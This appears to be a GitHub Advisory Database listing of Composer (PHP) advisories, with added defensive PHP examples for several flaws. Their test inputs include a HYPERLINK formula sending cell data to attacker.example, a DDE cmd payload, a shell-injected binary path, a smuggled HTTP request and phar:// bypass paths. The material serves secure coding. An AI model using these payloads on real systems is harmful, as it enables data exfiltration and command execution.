GitHub Advisory Database
Security vulnerability database inclusive of CVEs and GitHub-originated security advisories from the world of open source software.
GitHub reviewed advisories, by ecosystem:
All reviewed: 5,000+
Composer: 5,000+
Erlang: 91
GitHub Actions: 54
Go: 4,194
Maven: 5,000+
npm: 5,000+
NuGet: 1,021
pip: 5,000+
Pub: 13
RubyGems: 1,102
Rust: 1,422
Swift: 61

Unreviewed advisories:
All unreviewed: 5,000+
6,129 advisories shown (every entry below is for the Composer ecosystem).
Paymenter has a race condition in payWithCredit() that enables credit double-spend
Moderate. CVE-2026-55219 was published for paymenter/paymenter (Composer) on Jun 30, 2026.

Twig: Sandbox property allowlist bypass via the `column` filter under `SourcePolicyInterface`
Moderate. CVE-2026-48808 was published for twig/twig (Composer) on Jun 30, 2026.

Twig: Sandbox `__toString()` policy bypass via `Traversable` in `join` and `replace` filters
Moderate. CVE-2026-48807 was published for twig/twig (Composer) on Jun 30, 2026.

Twig: Sandbox `__toString()` policy bypass via dynamic mapping keys
Moderate. CVE-2026-48806 was published for twig/twig (Composer) on Jun 30, 2026.

Twig: Sandbox state regression in deprecated internal wrappers in `src/Resources/core.php`
Low. CVE-2026-48805 was published for twig/twig (Composer) on Jun 30, 2026.

Paymenter has a URL parameter injection that bypasses paid plan limits at checkout
High. CVE-2026-47198 was published for paymenter/paymenter (Composer) on Jun 30, 2026.

Statamic CMS's incorrect authorization lets view-only users submit Live Preview content reserved for editors
Low. CVE-2026-54244 was published for statamic/cms (Composer) on Jun 26, 2026.

Statamic vulnerable to CSV formula injection in form submission exports
Moderate. CVE-2026-54243 was published for statamic/cms (Composer) on Jun 26, 2026.
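The CSV formula injection entry above names a class that is closed at export time. The following is an added illustration, not Statamic's code: a cell neutraliser plus an exporter that applies it to every field. The submissions it exports are constructed for the example.

```php
<?php
declare(strict_types=1);
// Added illustration, not Statamic's code. Spreadsheet applications treat a cell
// that starts with '=', '+', '-' or '@' as a formula, so a hostile form submission
// exported to CSV can run a DDE or HYPERLINK payload on the machine of whoever
// opens the export. Neutralise at export time rather than at input time: the
// stored value stays intact and every exporter gets the same treatment.

function neutraliseCsvCell(string $value): string
{
    // Some applications skip leading tab, CR, LF or space before looking for the
    // trigger character, so check the first non-blank character, not byte 0.
    $lead = ltrim($value, " \t\r\n");
    if ($lead !== '' && strpos('=+-@', $lead[0]) !== false) {
        // A leading apostrophe forces text interpretation in Excel, LibreOffice
        // and Google Sheets. Known cost: negative numbers and phone numbers
        // such as "-1234" are exported as text as well.
        return "'" . $value;
    }
    return $value;
}

/** Export rows of submission data to a CSV string, neutralising every cell. */
function exportSubmissionsCsv(array $rows): string
{
    $fh = fopen('php://memory', 'w+');
    foreach ($rows as $row) {
        $cells = array_map(
            static fn($v): string => neutraliseCsvCell((string) $v),
            array_values($row)
        );
        // Explicit escape parameter: '' disables PHP's non-standard backslash
        // escaping so that quoting follows RFC 4180 and nothing can break out of
        // a quoted cell.
        fputcsv($fh, $cells, ',', '"', '');
    }
    rewind($fh);
    $csv = stream_get_contents($fh);
    fclose($fh);
    return $csv;
}

// Constructed submissions: the second row carries two formula payloads, one of
// them hidden behind a leading tab; the third shows the cost on a value that
// merely looks like a formula trigger.
$submissions = [
    ['name' => 'Alice',                                      'message' => 'Hello there'],
    ['name' => '=HYPERLINK("http://attacker.example/?"&A1)', 'message' => "\t@SUM(1+1)*cmd|' /C calc'!A0"],
    ['name' => '-Bob',                                       'message' => 'a "quoted" value, with comma'],
];
echo exportSubmissionsCsv($submissions);
```

Neutralising on export rather than on input is deliberate: the stored submission stays searchable and unchanged, and a second exporter added later cannot forget the step as long as it goes through the same function.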
Statamic vulnerable to Server-Side Request Forgery via Glide (DNS rebinding)
Moderate. CVE-2026-54242 was published for statamic/cms (Composer) on Jun 26, 2026.

SolidInvoice: IDOR in LiveComponent allows same-company cross-user access to API tokens and notification transport settings
High. GHSA-7vfx-4246-jcfh was published for solidinvoice/solidinvoice (Composer) on Jun 26, 2026.

Statamic CMS's unsafe method invocation via collection sorting allows data destruction
High. CVE-2026-49287 was published for statamic/cms (Composer) on Jun 26, 2026.

Statamic CMS: Missing authorization on Control Panel fieldtype endpoints allows disclosure of restricted resources
Moderate. CVE-2026-49288 was published for statamic/cms (Composer) on Jun 26, 2026.

PhpWeasyPrint vulnerable to SSRF and local file disclosure via the attachment option
Moderate. CVE-2026-49359 was published for pontedilana/php-weasyprint (Composer) on Jun 26, 2026.

PhpWeasyPrint vulnerable to arbitrary file deletion at shutdown via public $temporaryFiles
Low. CVE-2026-49358 was published for pontedilana/php-weasyprint (Composer) on Jun 26, 2026.

PhpWeasyPrint vulnerable to PHAR deserialization via output filename (CVE-2023-28115 case-insensitive bypass)
High. CVE-2026-49286 was published for pontedilana/php-weasyprint (Composer) on Jun 26, 2026.
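The PHAR entry above describes a prefix check that was defeated by changing the case of the scheme. The following is an added illustration, not php-weasyprint's or snappy's code; the function names and the probe paths are constructed for the example. It shows the case-sensitive check, the minimal case-insensitive correction, and the scheme-free allowlist a practitioner would prefer.

```php
<?php
declare(strict_types=1);
// Added illustration, not php-weasyprint's or snappy's code. PHP looks stream
// wrapper schemes up case-insensitively, so "PHAR://x" and "Phar://x" reach the
// phar wrapper exactly as "phar://x" does, and a filesystem call such as
// file_exists() or unlink() on such a path opens the archive (PHP before 8.0
// also unserialised the archive's metadata on such calls, which is the
// deserialisation path the CVE line refers to). A prefix check that compares
// case-sensitively blocks only one spelling.

// The CVE-2023-28115-style fix as the advisory title describes it: blocks
// "phar://" but not "PHAR://".
function rejectsPharCaseSensitive(string $path): bool
{
    return str_starts_with($path, 'phar://');
}

// Minimal correction: compare case-insensitively.
function rejectsPharCaseInsensitive(string $path): bool
{
    return stripos($path, 'phar://') === 0;
}

// Stronger: an output filename has no business carrying any scheme. Reject
// every "scheme://" prefix (phar, data, compress.zlib, ftp, ...) and NUL bytes.
function assertPlainOutputPath(string $path): string
{
    if (preg_match('~^[a-z][a-z0-9+.-]*://~i', ltrim($path)) === 1) {
        throw new InvalidArgumentException("stream wrapper scheme not allowed in output path: $path");
    }
    if (str_contains($path, "\0")) {
        throw new InvalidArgumentException('NUL byte in output path');
    }
    return $path;
}

// Constructed probes; the second is the bypass the advisory refers to.
$probes = ['phar://evil.phar/out.pdf', 'PHAR://evil.phar/out.pdf', 'Phar://evil.phar/out.pdf',
           'compress.zlib://evil.gz', '/var/app/out.pdf'];
foreach ($probes as $p) {
    try {
        assertPlainOutputPath($p);
        $allowlist = 'accepted';
    } catch (InvalidArgumentException $e) {
        $allowlist = 'rejected';
    }
    printf("%-26s case-sensitive:%-8s case-insensitive:%-8s scheme-free:%s\n", $p,
        rejectsPharCaseSensitive($p)   ? 'blocked' : 'ALLOWED',
        rejectsPharCaseInsensitive($p) ? 'blocked' : 'ALLOWED',
        $allowlist);
}
```

The allowlist form is the one to keep: it does not depend on knowing which wrappers are dangerous, and a Windows drive letter ("C:\out.pdf") still passes because the test is for "://", not for a bare colon.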
Aimeos Pagible CMS vulnerable to Server Side Request Forgery (SSRF) via DNS rebinding in admin proxy
Low. CVE-2026-49262 was published for aimeos/pagible (Composer) on Jun 26, 2026.
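Both the Statamic Glide entry and the Pagible admin proxy entry above are SSRF through DNS rebinding: the address is checked once and the HTTP client resolves the name a second time. The following is an added illustration, not Statamic's or Pagible's code. CURLOPT_RESOLVE is libcurl's real pinning option; the injectable resolver, the 203.0.113.10 answer (RFC 5737 documentation range) and the images.example host are constructed so the example runs without network access.

```php
<?php
declare(strict_types=1);
// Added illustration, not Statamic's or Pagible's code. A validator that resolves
// the hostname, checks the address, and then passes the original URL to an HTTP
// client resolves the name twice. With a short TTL the attacker's DNS answers the
// first lookup with a public address and the second with 127.0.0.1 or
// 169.254.169.254. The fix is to use the address that passed the check, by
// pinning it in the client (CURLOPT_RESOLVE), and never to re-resolve.

function isPublicIp(string $ip): bool
{
    // Excludes RFC 1918, ULA, loopback, link-local, 0/8, 240/4 and v4-mapped v6.
    // A deployment may need more (100.64.0.0/10, 192.0.0.0/24, ...); add them here.
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

/**
 * Resolve once through $resolver (host => list of IPs; defaults to DNS) and
 * return the single address the request will be pinned to. Every returned
 * address must be public: a mixed answer is rejected outright.
 */
function resolvePublicOnce(string $host, ?callable $resolver = null): string
{
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        $ips = [$host];                       // IP literal: nothing to resolve
    } else {
        $resolver ??= static function (string $h): array {
            $ips = [];
            foreach (dns_get_record($h, DNS_A | DNS_AAAA) ?: [] as $r) {
                $ips[] = $r['ip'] ?? $r['ipv6'];
            }
            return $ips;
        };
        $ips = $resolver($host);
    }
    if ($ips === []) {
        throw new RuntimeException("cannot resolve $host");
    }
    foreach ($ips as $ip) {
        if (!isPublicIp($ip)) {
            throw new RuntimeException("$host resolves to non-public address $ip");
        }
    }
    return $ips[0];
}

/** Build the curl options for a pinned fetch; returns [url, options]. */
function pinnedRequest(string $url, ?callable $resolver = null): array
{
    $p = parse_url($url);
    if (!isset($p['scheme'], $p['host']) || !in_array($p['scheme'], ['http', 'https'], true)) {
        throw new InvalidArgumentException('only http(s) URLs are accepted');
    }
    $port = $p['port'] ?? ($p['scheme'] === 'https' ? 443 : 80);
    $ip   = resolvePublicOnce($p['host'], $resolver);
    $pin  = str_contains($ip, ':') ? "[$ip]" : $ip;   // libcurl brackets IPv6 here
    return [$url, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_RESOLVE        => ["{$p['host']}:$port:$pin"], // no second DNS lookup
        CURLOPT_FOLLOWLOCATION => false,   // a 302 to an internal host would bypass the pin
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_TIMEOUT        => 10,
    ]];
}

// Constructed rebinding resolver: public on the first lookup (RFC 5737 test
// address), loopback on every lookup after that, as a rebinding DNS zone would.
$lookups = 0;
$rebinding = static function (string $host) use (&$lookups): array {
    return ++$lookups === 1 ? ['203.0.113.10'] : ['127.0.0.1'];
};

[$url, $opts] = pinnedRequest('http://images.example/logo.png', $rebinding);
printf("%s pinned via %s after %d lookup(s)\n", $url, $opts[CURLOPT_RESOLVE][0], $lookups);

// A validator that checks and then lets the client resolve again would now be
// fed 127.0.0.1; with the pin in place the second answer is never consulted.
try {
    resolvePublicOnce('images.example', $rebinding);
} catch (RuntimeException $e) {
    echo "second lookup: ", $e->getMessage(), "\n";
}
```

To perform the request, pass the returned options to curl_setopt_array() on a handle from curl_init($url). Redirects are left to the caller on purpose: each Location target has to go back through pinnedRequest(), otherwise a redirect to an internal name reintroduces the unpinned lookup.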
php-weasyprint: shell command injection via configurable WeasyPrint binary path due to inverted is_executable() guard (mirror of KnpLabs/snappy GHSA-vpr4-p6fq-85jc)
High. CVE-2026-49260 was published for pontedilana/php-weasyprint (Composer) on Jun 26, 2026.
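The entry above describes a guard whose condition was negated. The following is an added illustration, not php-weasyprint's or snappy's code: the guard with its intended sense, and the binary started through an argv array so that no shell parses the path or the option values. The probe paths and the use of /bin/echo as a stand-in renderer are constructed for the example.

```php
<?php
declare(strict_types=1);
// Added illustration, not php-weasyprint's or snappy's code. The advisory describes
// a guard whose sense was inverted: a configured binary path that was not an
// executable file was accepted and spliced into a shell command line. Two
// defences are shown together: the guard with its intended sense, and running
// the binary without a shell at all (proc_open with an argv array, PHP 7.4+), so
// that neither the path nor any option value is parsed as shell syntax.

function assertExecutable(string $binary): string
{
    // Intended sense: reject unless the path names an executable regular file.
    if (!is_file($binary) || !is_executable($binary)) {
        throw new InvalidArgumentException("'$binary' is not an executable file");
    }
    return $binary;
}

/** Run $binary with the given options; returns the exit code. */
function runRenderer(string $binary, array $options, string $input, string $output): int
{
    $argv = [assertExecutable($binary)];
    foreach ($options as $name => $value) {
        // Option names should come from a fixed allowlist in real code; values
        // are the user-influenced part and are passed as separate argv entries.
        $argv[] = '--' . $name;
        if ($value !== true) {
            $argv[] = (string) $value;
        }
    }
    $argv[] = $input;
    $argv[] = $output;

    $pipes = [];
    $proc = proc_open($argv, [1 => ['pipe', 'w'], 2 => ['pipe', 'w']], $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('failed to start renderer');
    }
    $stdout = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    $code = proc_close($proc);
    echo rtrim($stdout), "\n";
    return $code;
}

// Constructed probes. /bin/echo stands in for the renderer so the example runs on
// any POSIX system and prints the argv it received; the second "binary" is the
// kind of value the inverted guard let through, and the output name carries
// shell metacharacters that the argv form passes through untouched.
foreach (['/bin/echo', '/bin/echo; id', '/nonexistent/weasyprint'] as $bin) {
    try {
        $code = runRenderer($bin, ['format' => 'pdf', 'quiet' => true], 'in.html', "out;'; id #.pdf");
        echo "$bin: exit $code\n";
    } catch (InvalidArgumentException $e) {
        echo "$bin: rejected (", $e->getMessage(), ")\n";
    }
}
```

The guard is still worth keeping even with the argv form: it stops a configuration value from pointing the renderer at an arbitrary file, and it fails at configuration time rather than at the first render.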
phpMyFAQ has an incomplete fix for GHSA-xvp4-phqj-cjr3: editUser() and updateUserRights() lack authorization guards
High. GHSA-985r-q3qp-299h was published for phpmyfaq/phpmyfaq (Composer) on Jun 26, 2026.

WebauthnAuthenticator leaks sensitive HTTP headers through INFO-level logs
Moderate. GHSA-q683-8468-r6h6 was published for web-auth/webauthn-symfony-bundle (Composer) on Jun 26, 2026.

CakePHP: View::element() is missing a path containment check
Moderate. CVE-2026-48820 was published for cakephp/cakephp (Composer) on Jun 26, 2026.
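The CakePHP entry above, and the PhpWeasyPrint local file disclosure entry earlier in the list, both come down to a filesystem path built from a caller-supplied name without a containment check. The following is an added illustration, not CakePHP's or PhpWeasyPrint's code: a containment check on the canonical path, exercised against a fixture directory that the example creates under the system temp directory.

```php
<?php
declare(strict_types=1);
// Added illustration, not CakePHP's or PhpWeasyPrint's code. A name that reaches
// the filesystem as "$base/$name" can escape $base through "../" segments or a
// symlink. Checking the string for ".." is not enough; the containment test has
// to run on the canonical path, after every link and dot segment is resolved,
// and compare it against the canonical base plus a trailing separator.

function containedPath(string $baseDir, string $name): string
{
    $base = realpath($baseDir);
    if ($base === false) {
        throw new RuntimeException("base directory $baseDir does not exist");
    }
    // realpath() returns false for a path that does not exist, which is treated
    // as a miss: nothing is guessed about where a non-existent path would land.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($candidate === false) {
        throw new RuntimeException("no such file under base: $name");
    }
    // The trailing separator is the difference between "/srv/templates" and
    // "/srv/templates2"; a plain prefix test would accept the latter.
    if (!str_starts_with($candidate, $base . DIRECTORY_SEPARATOR)) {
        throw new RuntimeException("path escapes base directory: $name");
    }
    return $candidate;
}

// Constructed fixture in the temp directory: a base with one element inside it,
// a sibling directory whose name shares the base's prefix, and a file above both.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'containment_' . bin2hex(random_bytes(4));
mkdir("$root/templates/element", 0700, true);
mkdir("$root/templates2", 0700, true);
file_put_contents("$root/templates/element/menu.php", 'menu element');
file_put_contents("$root/templates2/secret.php", 'sibling directory');
file_put_contents("$root/outside.txt", 'parent directory');

$probes = [
    'element/menu.php',                     // legitimate
    '../outside.txt',                       // dot segment escape
    'element/../../templates2/secret.php',  // starts inside base, ends outside it
    '../templates2/secret.php',             // passes a prefix test that lacks the separator
];
foreach ($probes as $name) {
    try {
        echo "$name -> ", containedPath("$root/templates", $name), "\n";
    } catch (RuntimeException $e) {
        echo "$name -> rejected (", $e->getMessage(), ")\n";
    }
}
```

Resolving the base through realpath() as well matters on systems where the temp directory is itself a symlink (macOS /var → /private/var): comparing a resolved candidate against an unresolved base would reject every path.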
PHP Standard Library: HTTP/2 server-side missing content-length validation enables request smuggling
High. CVE-2026-48979 was published for php-standard-library/h2 (Composer) on Jun 26, 2026.
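The HTTP/2 entry above concerns the check that RFC 9113 requires between a declared content-length and the bytes actually carried in DATA frames. The following is an added illustration, not php-standard-library/h2's code: a per-stream collector that enforces the equality, fed constructed header blocks and DATA payloads rather than real frames.

```php
<?php
declare(strict_types=1);
// Added illustration, not php-standard-library/h2's code. RFC 9113 (section
// 8.1.1, malformed messages): a request with a content-length header whose value
// is not equal to the sum of the DATA frame payload lengths is malformed and is
// treated as a stream error of type PROTOCOL_ERROR. A server that forwards the
// header as received and the body as received hands a downstream parser a body
// that is shorter or longer than advertised; the surplus bytes are then read as
// the start of the next request. This collector enforces the equality per stream.

final class StreamBodyCollector
{
    private ?int $declared = null;
    private int $received = 0;
    private string $body = '';

    /** Header block of the stream; $endStream is the END_STREAM flag on HEADERS. */
    public function onHeaders(array $headers, bool $endStream): ?string
    {
        if (array_key_exists('content-length', $headers)) {
            // Only a plain decimal is valid; "+5", "5, 5" or "0x5" are rejected.
            if (preg_match('/^\d+$/', $headers['content-length']) !== 1) {
                throw new RuntimeException('PROTOCOL_ERROR: malformed content-length');
            }
            $this->declared = (int) $headers['content-length'];
        }
        return $endStream ? $this->finish() : null;
    }

    /** $payload is the DATA frame payload with padding already stripped. */
    public function onData(string $payload, bool $endStream): ?string
    {
        $this->received += strlen($payload);
        $this->body     .= $payload;
        // Fail as soon as the body overruns, not only at END_STREAM.
        if ($this->declared !== null && $this->received > $this->declared) {
            throw new RuntimeException("PROTOCOL_ERROR: {$this->received} body bytes exceed content-length {$this->declared}");
        }
        return $endStream ? $this->finish() : null;
    }

    private function finish(): string
    {
        if ($this->declared !== null && $this->received !== $this->declared) {
            throw new RuntimeException("PROTOCOL_ERROR: content-length {$this->declared} but {$this->received} body bytes received");
        }
        return $this->body;
    }
}

// Constructed streams: a well-formed request, then the malformed shapes. The
// 'overrun' case is the smuggling primitive: the bytes after "hello" would be
// parsed by a trusting upstream as a new request line.
$cases = [
    'exact'   => [['content-length' => '5'],    ['hello']],
    'overrun' => [['content-length' => '5'],    ['hello', "GET /admin HTTP/1.1\r\n"]],
    'short'   => [['content-length' => '32'],   ['hello']],
    'bogus'   => [['content-length' => '5, 5'], ['hello']],
];
foreach ($cases as $label => [$headers, $frames]) {
    $c = new StreamBodyCollector();
    try {
        $c->onHeaders($headers, false);
        $body = null;
        foreach ($frames as $i => $frame) {
            $body = $c->onData($frame, $i === array_key_last($frames));
        }
        printf("%-8s accepted, body = %s\n", $label, var_export($body, true));
    } catch (RuntimeException $e) {
        printf("%-8s rejected: %s\n", $label, $e->getMessage());
    }
}
```

Rejecting on overrun as soon as it happens, rather than waiting for END_STREAM, also bounds the memory a hostile stream can consume on a request that advertised a small body.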
Pterodactyl Panel: Client email change endpoint allows enumeration of accounts in system
Moderate. GHSA-j7f5-gfqm-pcx3 was published for pterodactyl/panel (Composer) on Jun 26, 2026.

Filament: Multi-factor authentication (app) recovery codes can still be used multiple times via concurrent submission
High. CVE-2026-48505 was published for filament/filament (Composer) on Jun 25, 2026.
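The Filament recovery-code entry above and the Paymenter payWithCredit() entry at the top of the list are the same check-then-act race on a consumable value. The following is an added illustration that serves both, not Paymenter's or Filament's code: the racy shape beside the atomic one, with an in-memory SQLite database, a constructed schema and the constructed code ABCD-1234 standing in for the real application.

```php
<?php
declare(strict_types=1);
// Added illustration, not Paymenter's or Filament's code. Both advisories are the
// same shape: a value is read, checked in PHP, and then written, and two requests
// that both pass the check before either writes both succeed (two debits of one
// balance; one recovery code accepted twice). The fix is to make the check part
// of the write, so the database serialises it, and to branch on the affected-row
// count instead of on a value read earlier. SQLite in memory stands in for the
// application database.

$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, credit INTEGER NOT NULL)');
$pdo->exec('CREATE TABLE recovery_codes (id INTEGER PRIMARY KEY, user_id INTEGER NOT NULL,
            code_hash TEXT NOT NULL, used_at TEXT NULL)');
$pdo->exec('INSERT INTO users (id, credit) VALUES (1, 100)');
$pdo->prepare('INSERT INTO recovery_codes (user_id, code_hash) VALUES (1, ?)')
    ->execute([password_hash('ABCD-1234', PASSWORD_DEFAULT)]);

// Vulnerable shape: the window between SELECT and UPDATE is the race.
function payWithCreditRacy(PDO $pdo, int $userId, int $amount): bool
{
    $q = $pdo->prepare('SELECT credit FROM users WHERE id = ?');
    $q->execute([$userId]);
    if ((int) $q->fetchColumn() < $amount) {
        return false;
    }
    // A concurrent request that ran the SELECT above before this UPDATE also
    // proceeds, and the balance goes negative.
    $pdo->prepare('UPDATE users SET credit = credit - ? WHERE id = ?')->execute([$amount, $userId]);
    return true;
}

// Hardened shape: the balance condition is inside the UPDATE. Of two concurrent
// callers exactly one sees rowCount() == 1; the other's WHERE no longer matches.
function payWithCreditAtomic(PDO $pdo, int $userId, int $amount): bool
{
    $q = $pdo->prepare('UPDATE users SET credit = credit - ? WHERE id = ? AND credit >= ?');
    $q->execute([$amount, $userId, $amount]);
    return $q->rowCount() === 1;
}

// Recovery codes are hashed, so the match has to happen in PHP; the consumption
// step is still a compare-and-set on used_at, which is what stops a second
// concurrent submission of the same code.
function consumeRecoveryCode(PDO $pdo, int $userId, string $code): bool
{
    $q = $pdo->prepare('SELECT id, code_hash FROM recovery_codes WHERE user_id = ? AND used_at IS NULL');
    $q->execute([$userId]);
    foreach ($q->fetchAll(PDO::FETCH_ASSOC) as $row) {
        if (!password_verify($code, $row['code_hash'])) {
            continue;
        }
        $mark = $pdo->prepare('UPDATE recovery_codes SET used_at = ? WHERE id = ? AND used_at IS NULL');
        $mark->execute([gmdate('c'), $row['id']]);
        return $mark->rowCount() === 1;   // 0 means another request consumed it first
    }
    return false;
}

// Two debits of 70 against a balance of 100, then the same recovery code
// submitted twice.
var_dump(payWithCreditAtomic($pdo, 1, 70), payWithCreditAtomic($pdo, 1, 70));
var_dump(consumeRecoveryCode($pdo, 1, 'ABCD-1234'), consumeRecoveryCode($pdo, 1, 'ABCD-1234'));
```

The pattern generalises to any consumable token (password-reset links, coupon codes, one-time download grants): the predicate that makes the operation valid belongs in the WHERE clause of the statement that consumes it, and the affected-row count is the only trustworthy success signal.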
Snipe-IT API vulnerable to cross-tenant accessory injection
High. CVE-2026-54329 was published for snipe/snipe-it (Composer) on Jun 23, 2026.

Snipe-IT's S3 signature image retrieval lacks authorization before temporary URL
Low. CVE-2026-55542 was published for snipe/snipe-it (Composer) on Jun 23, 2026.
Advisories are also available from the GraphQL API.